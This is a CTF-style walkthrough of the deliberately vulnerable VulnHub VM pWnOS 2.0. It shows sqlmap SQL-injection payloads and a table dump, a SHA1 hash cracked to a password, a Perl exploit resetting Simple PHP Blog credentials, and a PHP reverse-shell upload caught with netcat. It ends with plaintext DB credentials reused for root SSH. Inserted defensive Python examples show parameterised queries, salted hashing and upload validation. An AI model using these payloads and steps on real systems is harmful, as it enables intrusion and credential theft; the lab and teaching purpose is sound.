VulnHub target machine pentest [pWnOS 2.0 Pre-Release]

Name: pWnOS: 2.0 (Pre-Release)
Release date: 4 July 2011

Download:
Download: http://pwnos.com/files/pWnOS_v2.0.7z
Download (Mirror): https://download.vulnhub.com/pwnos/pWnOS_v2.0.7z
Download (Torrent): https://download.vulnhub.com/pwnos/pWnOS_v2.0.7z.torrent

Description:

pWnOS v2.0 (Pre-Release!)

Goal:
root... win!
About:
pWnOS v2.0 is a virtual machine image that hosts a server for practising penetration testing. It will test your ability to exploit the server and contains multiple entry points to reach the goal (root). It was designed for use with VMware Workstation 7.0, but should also work with most other virtual machine software.

Configuration and setup:
Configure the attack platform on the 10.10.10.0/24 network range
e.g. set the BackTrack 5 network adapter to the static IP address 10.10.10.200 with netmask 255.255.255.0.

VMware's network adapter is set to Bridged
Depending on your setup you may need to change VMware's network adapter to NAT or Host-only

The server's IP is statically set to 10.10.10.100

Server network settings:
IP: 10.10.10.100
Netmask: 255.255.255.0
Gateway: 10.10.10.15

Vulnerabilities:

  • Insecure file handling
  • Plaintext passwords
  • Credential reuse
  • SQL injection
  • Unrestricted upload of dangerous file types

Configuring the network

For complete beginners who may not even manage the network configuration, just follow the settings in the image below, then test network reachability.

root@kali:~# ping 10.10.10.100
PING 10.10.10.100 (10.10.10.100) 56(84) bytes of data.
64 bytes from 10.10.10.100: icmp_seq=1 ttl=64 time=0.223 ms
64 bytes from 10.10.10.100: icmp_seq=2 ttl=64 time=0.414 ms
64 bytes from 10.10.10.100: icmp_seq=3 ttl=64 time=0.342 ms
64 bytes from 10.10.10.100: icmp_seq=4 ttl=64 time=0.357 ms
64 bytes from 10.10.10.100: icmp_seq=5 ttl=64 time=0.416 ms
^C
--- 10.10.10.100 ping statistics ---
5 packets transmitted, 5 received, 0% packet loss, time 4092ms
rtt min/avg/max/mdev = 0.223/0.350/0.416/0.070 ms

nice done!!!

Information gathering

Bring on nmap.

22/tcp open  ssh     OpenSSH 5.8p1 Debian 1ubuntu3 (Ubuntu Linux; protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
80/tcp open http Apache httpd 2.2.17 ((Ubuntu))
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-cookie-flags:
| /:
| PHPSESSID:
| httponly flag not set
| /login.php:
| PHPSESSID:
| httponly flag not set
| /login/:
| PHPSESSID:
| httponly flag not set
| /index/:
| PHPSESSID:
| httponly flag not set
| /register/:
| PHPSESSID:
|_ httponly flag not set
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.10.100
| Found the following possible CSRF vulnerabilities:
|
| Path: http://10.10.10.100:80/login.php
| Form id:
| Form action: login.php
|
| Path: http://10.10.10.100:80/register.php
| Form id:
|_ Form action: register.php
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /blog/: Blog
| /login.php: Possible admin folder
| /login/: Login page
| /info.php: Possible information file
| /icons/: Potentially interesting folder w/ directory listing
| /includes/: Potentially interesting directory w/ listing on 'apache/2.2.17 (ubuntu)'
| /index/: Potentially interesting folder
| /info/: Potentially interesting folder
|_ /register/: Potentially interesting folder
|_http-server-header: Apache/2.2.17 (Ubuntu)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)


At the login page there is an injection, so straight to sqlmap.

root@kali:~# sqlmap -r sqlmap.txt -D ch16 -T users --dump
___
__H__
___ ___[)]_____ ___ ___ {1.3.12#stable}
|_ -| . [.] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 05:56:36 /2019-12-15/

[05:56:36] [INFO] parsing HTTP request from 'sqlmap.txt'
[05:56:36] [INFO] resuming back-end DBMS 'mysql'
[05:56:36] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: email (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
Payload: email=124123' OR NOT 3619=3619#&pass=dvfvsdfvsdf&submit=Login&submitted=TRUE

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: email=124123' AND (SELECT 1325 FROM(SELECT COUNT(*),CONCAT(0x7170706a71,(SELECT (ELT(1325=1325,1))),0x7170627171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- gsUK&pass=dvfvsdfvsdf&submit=Login&submitted=TRUE

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: email=124123' AND (SELECT 5062 FROM (SELECT(SLEEP(5)))bAlG)-- SXBw&pass=dvfvsdfvsdf&submit=Login&submitted=TRUE

Type: UNION query
Title: MySQL UNION query (NULL) - 8 columns
Payload: email=124123' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7170706a71,0x564e4f70794e7171465a644f695056686b6e54576e757163667a7476486252574f76717264665950,0x7170627171),NULL,NULL,NULL,NULL#&pass=dvfvsdfvsdf&submit=Login&submitted=TRUE
---
[05:56:36] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0
[05:56:36] [INFO] fetching columns for table 'users' in database 'ch16'
[05:56:36] [INFO] used SQL query returns 8 entries
[05:56:36] [INFO] resumed: 'user_id','int(10) unsigned'
[05:56:36] [INFO] resumed: 'first_name','varchar(20)'
[05:56:36] [INFO] resumed: 'last_name','varchar(40)'
[05:56:36] [INFO] resumed: 'email','varchar(80)'
[05:56:36] [INFO] resumed: 'pass','char(40)'
[05:56:36] [INFO] resumed: 'user_level','tinyint(1) unsigned'
[05:56:36] [INFO] resumed: 'active','char(32)'
[05:56:36] [INFO] resumed: 'registration_date','datetime'
[05:56:36] [INFO] fetching entries for table 'users' in database 'ch16'
[05:56:36] [INFO] used SQL query returns 1 entry
[05:56:36] [INFO] recognized possible password hashes in column 'pass'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] n
do you want to crack them via a dictionary-based attack? [Y/n/q] n
Database: ch16
Table: users
[1 entry]
+---------+------------------------------------------+------------------+--------+-----------+------------+------------+---------------------+
| user_id | pass                                     | email            | active | last_name | first_name | user_level | registration_date   |
+---------+------------------------------------------+------------------+--------+-----------+------------+------------+---------------------+
| 1       | c2c4b4e51d9e23c02c15702c136c3e950ba9a4af | admin@isints.com | NULL   | Privett   | Dan        | 0          | 2011-05-07 17:27:01 |
+---------+------------------------------------------+------------------+--------+-----------+------------+------------+---------------------+

[05:56:39] [INFO] table 'ch16.users' dumped to CSV file '/root/.sqlmap/output/10.10.10.100/dump/ch16/users.csv'
[05:56:39] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.10.10.100'

[*] ending @ 05:56:39 /2019-12-15/
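Why the email field was injectable, as an added example that is not part of the original write-up or the pWnOS image: a constructed stand-in for the ch16.users table from the dump above (sqlite3 in place of MySQL, so the comment sequence is `-- ` as in sqlmap's error-based payload rather than `#`), with the string-concatenated login query beside a parameterised one. The password in the row is the one the write-up recovers; everything else is my own naming.

```python
import hashlib
import sqlite3

# Constructed stand-in for ch16.users (columns as in the sqlmap dump above);
# the application stores an unsalted SHA1 hex digest in `pass` char(40).
DB = sqlite3.connect(":memory:")
DB.execute("""CREATE TABLE users (
    user_id INTEGER PRIMARY KEY, first_name TEXT, last_name TEXT, email TEXT,
    pass TEXT, user_level INTEGER, active TEXT, registration_date TEXT)""")


def sha1_hex(password: str) -> str:
    return hashlib.sha1(password.encode()).hexdigest()


DB.execute(
    "INSERT INTO users VALUES (1, 'Dan', 'Privett', 'admin@isints.com', ?, 0, "
    "NULL, '2011-05-07 17:27:01')",
    (sha1_hex("killerbeesareflying"),),
)


def login_vulnerable(email: str, password: str):
    # The submitted email is spliced into the SQL text, so a quote followed by
    # a comment sequence rewrites the WHERE clause: this is the hole sqlmap
    # drove its boolean, error, time and UNION payloads through.
    sql = (f"SELECT user_id FROM users WHERE email='{email}' "
           f"AND pass='{sha1_hex(password)}'")
    row = DB.execute(sql).fetchone()
    return row[0] if row else None


def login_fixed(email: str, password: str):
    # Parameterised query: values travel separately from the SQL text, so
    # quotes and comment markers in `email` are compared as data, not parsed.
    sql = "SELECT user_id FROM users WHERE email=? AND pass=?"
    row = DB.execute(sql, (email, sha1_hex(password))).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    bypass = "' OR 1=1-- "  # constructed payload, same shape as the dump's `-- gsUK` suffix
    print(login_vulnerable(bypass, "anything"))  # 1: authenticated without a password
    print(login_fixed(bypass, "anything"))       # None
```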

The SHA1 hash c2c4b4e51d9e23c02c15702c136c3e950ba9a4af cracks to killerbeesareflying; logging in with the email and this password turned up nothing.
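Why a 40-character unsalted SHA1 in `pass` char(40) falls to a plain wordlist lookup, beside the storage scheme that would have resisted it. This is an added example, not code from the pWnOS application; the PBKDF2 iteration count and the `$`-separated record layout are my assumptions.

```python
import hashlib
import hmac
import os

# Work factor for PBKDF2-HMAC-SHA256 (assumption: OWASP's current guidance;
# tune so one verification costs roughly 100 ms on the real hardware).
ITERATIONS = 600_000


def legacy_hash(password: str) -> str:
    # What the CTF application stores: unsalted SHA1 hex, 40 chars. Identical
    # passwords give identical digests, so one precomputed table or one
    # wordlist pass covers every account in the dump at once.
    return hashlib.sha1(password.encode()).hexdigest()


def legacy_verify(stored: str, password: str) -> bool:
    return hmac.compare_digest(stored.encode(), legacy_hash(password).encode())


def hardened_hash(password: str, salt: bytes = None) -> str:
    # Per-user random salt plus a slow KDF. Record format (an assumption):
    # algorithm$iterations$salt_hex$derived_key_hex, so the parameters can be
    # raised later without asking users for their password again.
    salt = salt if salt is not None else os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${dk.hex()}"


def hardened_verify(stored: str, password: str) -> bool:
    try:
        algo, iters, salt_hex, dk_hex = stored.split("$")
        if algo != "pbkdf2_sha256":
            return False
        dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), int(iters))
    except ValueError:  # malformed record: wrong field count, bad hex or int
        return False
    # Constant-time compare so timing does not leak how many bytes matched.
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    pw = "killerbeesareflying"
    print(legacy_hash(pw) == legacy_hash(pw))        # True: two users, one digest
    print(hardened_hash(pw) == hardened_hash(pw))    # False: salt differs per user
```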

A round of dirb directory scanning.

root@kali:~# dirb http://10.10.10.100/

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sun Dec 15 05:59:36 2019
URL_BASE: http://10.10.10.100/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://10.10.10.100/ ----
+ http://10.10.10.100/activate (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.10.100/blog/
+ http://10.10.10.100/cgi-bin/ (CODE:403|SIZE:288)
==> DIRECTORY: http://10.10.10.100/includes/
+ http://10.10.10.100/index (CODE:200|SIZE:854)
+ http://10.10.10.100/index.php (CODE:200|SIZE:854)
+ http://10.10.10.100/info (CODE:200|SIZE:50175)
+ http://10.10.10.100/info.php (CODE:200|SIZE:50044)
+ http://10.10.10.100/login (CODE:200|SIZE:1174)
+ http://10.10.10.100/register (CODE:200|SIZE:1562)
+ http://10.10.10.100/server-status (CODE:403|SIZE:293)

---- Entering directory: http://10.10.10.100/blog/ ----
+ http://10.10.10.100/blog/add (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/atom (CODE:200|SIZE:1062)
+ http://10.10.10.100/blog/categories (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/comments (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.10.100/blog/config/
+ http://10.10.10.100/blog/contact (CODE:200|SIZE:5918)
==> DIRECTORY: http://10.10.10.100/blog/content/
+ http://10.10.10.100/blog/delete (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.10.100/blog/docs/
==> DIRECTORY: http://10.10.10.100/blog/flash/
==> DIRECTORY: http://10.10.10.100/blog/images/
+ http://10.10.10.100/blog/index (CODE:200|SIZE:8094)
+ http://10.10.10.100/blog/index.php (CODE:200|SIZE:8094)
+ http://10.10.10.100/blog/info (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/info.php (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.10.100/blog/interface/
==> DIRECTORY: http://10.10.10.100/blog/languages/
+ http://10.10.10.100/blog/login (CODE:200|SIZE:5667)
+ http://10.10.10.100/blog/logout (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/options (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/rdf (CODE:200|SIZE:1411)
+ http://10.10.10.100/blog/rss (CODE:200|SIZE:1237)
==> DIRECTORY: http://10.10.10.100/blog/scripts/
+ http://10.10.10.100/blog/search (CODE:200|SIZE:4950)
+ http://10.10.10.100/blog/setup (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/static (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/stats (CODE:200|SIZE:5309)
==> DIRECTORY: http://10.10.10.100/blog/themes/
+ http://10.10.10.100/blog/trackback (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/upgrade (CODE:302|SIZE:0)

getshell

The scan found the blog directory. Visiting http://10.10.10.100/blog/ and viewing the page source shows it is Simple PHP Blog 0.4.0; searching online for exploits turns up a whole pile of them.

Exploit-DB has several matching exploits: a Metasploit module, and the Perl-based exploit I decided to use. The Perl script download address:

Use this PoC to change the blog's username and password.

root@kali:~# ./SimplePHPBlog.pl -h http://10.10.10.100/blog/ -e 3 -U admin -P admin
________________________________________________________________________________
SimplePHPBlog v0.4.0 Exploits
by
Kenneth F. Belva, CISSP
http://www.ftusecurity.com
________________________________________________________________________________
Running Set New Username and Password Exploit....


Deleted File: ./config/password.txt
./config/password.txt created!
Username is set to: admin
Password is set to: admin


*** Exploit Completed....
Have a nice day! :)

Changed successfully; admin/admin logs in.

Find the upload point and upload a PHP reverse shell.

Files with a .php extension can be uploaded directly.

Then browse to php-reverse-shell.php; with Kali listening via nc -lvp 5566, a shell comes back.
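The check the blog's upload handler was missing, which is what let a .php file through. This is an added example and not Simple PHP Blog's code; `UPLOAD_DIR`, the allowed-type table, the size limit and the random server-side name are my assumptions.

```python
import os
import secrets

# Allowed extensions mapped to the magic bytes their content must start with
# (constructed policy for an image-only upload point).
ALLOWED = {
    "jpg": (b"\xff\xd8\xff",), "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",), "gif": (b"GIF87a", b"GIF89a"),
}
MAX_BYTES = 2 * 1024 * 1024
UPLOAD_DIR = "/srv/uploads"  # assumption: outside the web root, no PHP handler


def validate_upload(filename: str, data: bytes):
    """Return (True, server-chosen name) or (False, reason)."""
    base = os.path.basename(filename)
    if base != filename or base.startswith("."):
        return False, "path component or hidden name"
    parts = base.lower().split(".")
    if len(parts) != 2:          # rejects shell.php.jpg and bare names alike
        return False, "missing or multiple extensions"
    ext = parts[1]
    if ext not in ALLOWED:       # allow-list, never a deny-list of .php etc.
        return False, f"extension .{ext} not allowed"
    if len(data) > MAX_BYTES:
        return False, "too large"
    if not any(data.startswith(m) for m in ALLOWED[ext]):
        return False, "content does not match extension"
    if b"<?php" in data or b"<?=" in data:   # defence in depth against polyglots
        return False, "embedded PHP tag"
    # The client's filename never reaches disk; the server picks the name.
    return True, f"{secrets.token_hex(16)}.{ext}"


if __name__ == "__main__":
    # Constructed sample inputs: a PHP shell and a tiny PNG header.
    print(validate_upload("php-reverse-shell.php", b"<?php echo 1; ?>"))
    print(validate_upload("photo.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 32))
```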

root@kali:~# nc -lvp 5566
listening on [any] 5566 ...
10.10.10.100: inverse host lookup failed: Host name lookup failure
connect to [10.10.10.128] from (UNKNOWN) [10.10.10.100] 34832
Linux web 2.6.38-8-server #42-Ubuntu SMP Mon Apr 11 03:49:04 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux
16:07:45 up 2:14, 0 users, load average: 0.03, 0.03, 0.02
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ whoami
www-data
$

Privilege escalation

Use the following command to upgrade the shell.

$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@web:/$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@web:/$ id^^^H^H^H^H^H^H^H
www-data@web:/$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@web:/$ whoami
www-data
www-data@web:/$ ls
bin dev home lib lost+found mnt proc sbin srv tmp var
boot etc initrd.img lib64 media opt root selinux sys usr vmlinuz

Look in /var/www for the username and password in the database configuration file.

$ pwd
/var/www
$ cat mysqli_connect.php
<?php # Script 8.2 - mysqli_connect.php

// This file contains the database access information.
// This file also establishes a connection to MySQL
// and selects the database.

// Set the database access information as constants:

DEFINE ('DB_USER', 'root');
DEFINE ('DB_PASSWORD', 'goodday');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'ch16');

// Make the connection:

$dbc = @mysqli_connect (DB_HOST, DB_USER, DB_PASSWORD, DB_NAME) OR die ('Could not connect to MySQL: ' . mysqli_connect_error() );

?>$

Tried this password and it was wrong, but there is another mysqli_connect.php under /var/.

$ cat mysqli_connect.php
<?php # Script 8.2 - mysqli_connect.php

// This file contains the database access information.
// This file also establishes a connection to MySQL
// and selects the database.

// Set the database access information as constants:

DEFINE ('DB_USER', 'root');
DEFINE ('DB_PASSWORD', 'root@ISIntS');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'ch16');

// Make the connection:

$dbc = @mysqli_connect (DB_HOST, DB_USER, DB_PASSWORD, DB_NAME) OR die ('Could not connect to MySQL: ' . mysqli_connect_error() );

www-data@web:/var$ mysql -uroot -proot@ISIntS

Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 9823
Server version: 5.1.54-1ubuntu4 (Ubuntu)

Copyright (c) 2000, 2010, Oracle and/or its affiliates. All rights reserved.
This software comes with ABSOLUTELY NO WARRANTY. This is free software,
and you are welcome to modify and redistribute it under the GPL v2 license

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| ch16               |
| mysql              |
+--------------------+
3 rows in set (0.00 sec)

mysql>

The password in the config file under /var connects to the MySQL database fine; now try the same username and password over SSH.

root@kali:~# ssh root@10.10.10.100
root@10.10.10.100's password:
Welcome to Ubuntu 11.04 (GNU/Linux 2.6.38-8-server x86_64)

* Documentation: http://www.ubuntu.com/server/doc

System information as of Sun Oct 20 16:31:46 EDT 2019

System load: 0.0 Processes: 81
Usage of /: 2.9% of 38.64GB Users logged in: 0
Memory usage: 23% IP address for eth0: 10.10.10.100
Swap usage: 0%

Graph this data and manage this system at https://landscape.canonical.com/
Last login: Sun Oct 20 16:18:11 2019 from 10.10.10.128
root@web:~# id
uid=0(root) gid=0(root) groups=0(root)
root@web:~# whoami
root

Success, challenge complete!!! Awesome, slick as hell!!!

Sorry, this time I still couldn't find that Greek master's idiot-proof one-click clear script, I am so sorry about this... It's a pity...

The end, to be continued...